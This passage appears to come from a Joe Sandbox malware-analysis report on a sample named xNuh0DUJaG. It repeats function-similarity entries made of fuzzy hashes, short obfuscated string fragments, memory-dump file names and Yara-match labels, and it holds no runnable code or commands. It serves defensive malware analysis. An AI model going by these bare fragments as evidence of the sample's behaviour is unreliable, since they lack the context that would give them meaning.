• Instruction ID: bba7ce1cbd9d7b5964ace128991244c7d88d52c60c2cfa081a52f8c92ce1e01e
• Opcode Fuzzy Hash: 295c829244e78f24e812d08f7068f6e887247ac70f2c98393ecae3702f4aeb52
• Instruction Fuzzy Hash: 48D1687260C3558FD725CF28D45069FFBE6EBC4304F06892DE8A99B281D774D60ACB86
Strings
Memory Dump Source
• Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
Similarity
• API ID:
• String ID: 'P0V$,D,J$9HiN$WT
• API String ID: 0-3770969982
• Opcode ID: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
• Instruction ID: 1a2b24427ca50ea0613cce179253f9256e84f06a3d156f412d4f3691be65671a
• Opcode Fuzzy Hash: db0a98afcbfdb664a44cceaff5c849975bf5989fe3d7f245b03da2a88515caab
• Instruction Fuzzy Hash: 72B123B664D3549BD304CF62D8802AFBBE2FBC1314F098D2DE1C897341D779884A8B86
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: 'P0V$,D,J$9HiN$WT
• API String ID: 0-3770969982
• Opcode ID: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
• Instruction ID: ae41a8695f5a39636fa6a68c7fb5efa5c8bdd939795bcfb3308c1a97ca196a4b
• Opcode Fuzzy Hash: 0e2b0cc12e3226d2cd341a2167d348b6fcb24ba631dfe2d9486f098724b9ef4e
• Instruction Fuzzy Hash: 5B71C0B558D3958BD304DF12C8802AFBBE2FBD1314F188E6CE5D85B251D739854A8F86
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: FOOE$KGFU$KGFU$UUQg
• API String ID: 0-60738199
• Opcode ID: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
• Instruction ID: 62bc8477b215829dc04ceb4204e333c28d2a1deaa6eb44a938cf6ff6ba360235
• Opcode Fuzzy Hash: 6cf9c5cec0f80acf9d2adc729e7b0a961c5be7fa5a2f2669f24e8ed63becf1bb
• Instruction Fuzzy Hash: 1D51B1B29C16738FD714CB68C8405ABFBA2EF55310B1E4665D8658B3C1D334E91BC791
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: B:$C@$K3$bX_^
• API String ID: 0-595269213
• Opcode ID: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
• Instruction ID: 3a7d082670df0f1c546c1b73264e0000b1e3510e65ff35c29e3624a7f964fb88
• Opcode Fuzzy Hash: 0d06cbe45fa1c6c57b514cd4ae27e395b8e4d2b4ab09be3f8917ba205efd2598
• Instruction Fuzzy Hash: 2D41CEB5D112289FDB20DF79CD827DDBFB1AB85300F4442AAE448A7295D7340E898FD2
Strings
Memory Dump Source
• Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
Yara matches
Similarity
• API ID:
• String ID: (ijkdefgau`c$au`c$defgau`c
                                                                                                                                                                                                                                        • API String ID: 0-3415814675
                                                                                                                                                                                                                                        • Opcode ID: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
                                                                                                                                                                                                                                        • Instruction ID: 01b61d90eb2c4c37dea6c360f939e8462e4f1f4c47fce89660c5c00d59f8af24
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9e8d5e03b0b2b75bc4d5eda427d96198f973e9ec1b0f4896e10352321ad71037
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 79D1AEB16483908FD714DF28C891AABBBE5EFC5318F14892CF9858B391E775D809CB52
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$.$K
                                                                                                                                                                                                                                        • API String ID: 0-4278605028
                                                                                                                                                                                                                                        • Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction ID: f2fe18d41bc0f64dad6973a761127bb2c20b85318e04bf33eef07a0f9c547c75
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: C9029D71614BC08BE3198F3DC891352BFE2AB56304F0CC9ADD4DACB78AC279E5458B65
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: $$.$K
                                                                                                                                                                                                                                        • API String ID: 0-4278605028
                                                                                                                                                                                                                                        • Opcode ID: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction ID: 6a15d43e6d9dc7541644536baa1fca88b34eed3a23bb6af0385b7f8a4183f52c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d51ca7546fb35149707e9a4e558836ac4b566572d278ca2866f6bef816fa7ae2
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 69029E71614BC08BE3158F3DC891392BFE2AB56304F1CC9AED4DACB787C229E5458B65
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction ID: 482a90b53e3be27ff54803163605d3915a64a5763dfc8d0d66df8d09247d87cb
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 0D81EA6024C3918BD719CF39856137AFBE29FD6218F2C896DF4D58B281D379C50ACB16
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction ID: f131fe9443a432f4b8b213cbfd6ec4ed684797140b3a19f970cf386be340d58e
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: CA81DA6124C3918BD719CF3984A137AFBE29FD6218F2C896DF4D58B281D379C50AC716
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction ID: 3d775767d977819f4cd04dfa65fb75d6d4b79ad1faca8718d285b39be461a68a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d7cf588a064f1155daa4d7c44af41ec226caa0cd09314393bb3aaf469a1037c3
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1781F86020C3928BD719CF3A946137BBFD19FD6314F69896EE4D68B381D27DC406871A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction ID: e8062cfa3f92b269e517a95a0a15263ae71e3fa69566e020a52e9e5137cfccfc
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: d59d36acd5cd2e828688b9d714447d50828384055e21535b96a5200c43e5d42a
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7281F86030C3928BD718CF3A946136BBBD19FD6314F69896EE4D68B381D27DC406875A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: #=0$Z$ut
                                                                                                                                                                                                                                        • API String ID: 0-1971374411
                                                                                                                                                                                                                                        • Opcode ID: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                        • Instruction ID: 42d3a945511ead4ed7eb64260d71ddddd0654dd79c184a917e0c59020751881d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: be4ac88b631f695b8da9113a151050db4f90e52ffa014f1e1e87b4b39f4c50ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F481053110C3828AD7058F38C5A076AFFE1AF93618F1899ADD4D29B6D3D769C50AC752
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction ID: 4e91ba10509c99057e522f134dd552df8ce00cc9fb23ae0ddfc6b0978cc1ae6a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E81D9612483918BD719CF3984A137AFFE29FD6218F1C496DF4D18B281D339C50ACB56
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 8<j?$D$4b
                                                                                                                                                                                                                                        • API String ID: 0-2390459867
                                                                                                                                                                                                                                        • Opcode ID: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction ID: b31d7765b50fe5da72acd4eceaa3461b1016088ded1e177ce8b27f3ca53c8b68
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 9551c1296e75a185e8b16465c2714311d826185385f0d2d897db6609d4c85006
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 7E81E8602083918BD719CF3A946136BFFD29FE6314F6D496EE4D18B381D23CC5068B5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID: InitializeThunk
                                                                                                                                                                                                                                        • String ID: D`a&$NMNO$bX_^
                                                                                                                                                                                                                                        • API String ID: 2994545307-620122162
                                                                                                                                                                                                                                        • Opcode ID: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                                                                                                                                                        • Instruction ID: 6e9e5fc7c2cb7ec0ed59593f00f51acd5d9bbc11244cb29e2d173750d6d6eb6d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 51c52ee6fa743efb5b12906464a989dcb7610fc356cb75f60a3162c2e45413f4
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 558167312083014FE318DF24DC8166BB7A2EBC5328F69862DE5A54B391DB79ED0AC759
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$7$gfff
                                                                                                                                                                                                                                        • API String ID: 0-3859371245
                                                                                                                                                                                                                                        • Opcode ID: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
                                                                                                                                                                                                                                        • Instruction ID: 5386bd131c15603fb9593596c4608c3c37134d7ede0c1f8828f48437460f5d4a
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 60e49d7894c15ae3aa33853dce523991c204049145f125d3a07e5eda309779ae
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 61812772A542518BD328CF28CC51BAB77D2EBC4314F1AC93DD495DB395EB38D5068B81
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: )$7$gfff
                                                                                                                                                                                                                                        • API String ID: 0-3859371245
                                                                                                                                                                                                                                        • Opcode ID: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
                                                                                                                                                                                                                                        • Instruction ID: 9f03ba7914f0360cb7709cea8ad3b28f347f0d2189de7c473bd193f5a0b7fd0c
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 65dc81d769e5c8ee4e27a7d15ee325795d27feb2d3b9459f78503db774decfd6
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: D4812572A142118BD324CF28DC417AB77E2EBC8314F18C92ED985DB395EB3CD8468785
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: FOOE$KGFU$UUQg
                                                                                                                                                                                                                                        • API String ID: 0-2281124432
                                                                                                                                                                                                                                        • Opcode ID: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
                                                                                                                                                                                                                                        • Instruction ID: e3d0f05a3102c402a5be3d16b6d50dde008b8d5973f854c9b7a8b98ef3316d4d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: aa3e6234d37e5ff48adc82abd2c06de17444a92e0354e9c2c603a59569284f89
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9A619D72B49262CFD710CBA4D8402AAF7A2EF55310B5D42ABD8558B382E33CDD12D3A5
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 5230$I`af$t]ae
                                                                                                                                                                                                                                        • API String ID: 0-812676372
                                                                                                                                                                                                                                        • Opcode ID: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
                                                                                                                                                                                                                                        • Instruction ID: c82dbcb598043c5e25759bf7f640b69b66c4d0938de340b83326361af9066621
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 99ad52d241a312d1886458a9d982083b732080c3046440976dde46d31c833c5f
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 31513772A59B808FD739CF65C891B67BBE3AB91308F19896DC1C287695DBB9A005C700
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1$5230$A
                                                                                                                                                                                                                                        • API String ID: 0-2921844354
                                                                                                                                                                                                                                        • Opcode ID: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
                                                                                                                                                                                                                                        • Instruction ID: 1681a60db8ab902e8cb0d2e519a85c9a5933a279ccc1e45f417515bb0feaa5c3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: c88d49dccca9c115cac4552a1e1a4679eb3bb04cb6d09c4ebc94843ec1f1dc21
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 06416872A8C3406AE724AE65DC8176BB6E3EBD1324F1CC97DE199572C4EAB944038312
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmp
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 1$5230$A
                                                                                                                                                                                                                                        • API String ID: 0-2921844354
                                                                                                                                                                                                                                        • Opcode ID: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
                                                                                                                                                                                                                                        • Instruction ID: e76a71f95e24524307293e01d01a6f58a23ad2f1a40c0433447d02162c8ae966
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 2f0b92b3633f1c98435bd7295618cc795514d651c00833ac90ced833c2e04a77
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: F8416972A5C3405AE324AE65CC827ABB6D3EBD1324F18C93EF1D9472C5E9F848428316
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1542259428.0000000002100000.00000040.00001000.00020000.00000000.sdmp, Offset: 02100000, based on PE: false
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_2100000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Yara matches
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: .$GetProcAddress.$l
                                                                                                                                                                                                                                        • API String ID: 0-2784972518
                                                                                                                                                                                                                                        • Opcode ID: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction ID: 8d3964254565dfb7a40da2e234806515813b4f54de45dc01fec139ea16ba0e7d
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 067b9ac1cfdfa220879cc7a8ef70782a20aa364414f13e2dc252473fde93e59c
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 573148B6900609DFDB10CF99C880BAEBBF9FF48324F15404AD845A7250D7B1EA45CBA4
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: NP,?$UA
                                                                                                                                                                                                                                        • API String ID: 0-2573221895
                                                                                                                                                                                                                                        • Opcode ID: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                                                                                                                                                        • Instruction ID: 7e2827b50fa6ca7fd58d98589243822aea337e03717d5c259c09a672e0419966
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: f3b4bdac48d04733325c366b291ac1942f3de7c5feead7c6aebd27b0ca121fbf
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1F522475608310DBD714DF28DC82BAB73A2EBC6314F58463DF995872E1E738A846C789
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: 9B$B
                                                                                                                                                                                                                                        • API String ID: 0-4208784936
                                                                                                                                                                                                                                        • Opcode ID: 998969fd36f39ea8882a93f1b2bc5358949fe11c9a695f48cb2043242e4bd665
                                                                                                                                                                                                                                        • Instruction ID: b8962ee0846928653caa32ab1d9872d6313577c24d17d84896ac92dc99d0ed25
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 998969fd36f39ea8882a93f1b2bc5358949fe11c9a695f48cb2043242e4bd665
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: EF72B1B1619F808ED329CF3C8805397BFD6AB5A324F188B5EA0FA877D2C77561018756
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                                                        • Source File: 00000003.00000002.1541818653.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                        • Associated: 00000003.00000002.1541818653.0000000000455000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                        • Snapshot File: hcaresult_3_2_400000_xNuh0DUJaG.jbxd
                                                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                                                        • API ID:
                                                                                                                                                                                                                                        • String ID: {wBy$?;;
                                                                                                                                                                                                                                        • API String ID: 0-3800777323
                                                                                                                                                                                                                                        • Opcode ID: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
                                                                                                                                                                                                                                        • Instruction ID: c7db1f9763108cdebf81104c4566820d91597438b4a38115d6d9003e34c696d3
                                                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7def6b60f56c6d725d5e071de4d200a350b8a8c6a335b4aaf75fe223ba032cac
                                                                                                                                                                                                                                        • Instruction Fuzzy Hash: 1AF1F1B4A08350DFD3159F28E89172BB7E1EF86308F484A6DF4D5872A2D3399901DB5A
                                                                                                                                                                                                                                        Strings
                                                                                                                                                                                                                                        Memory Dump Source
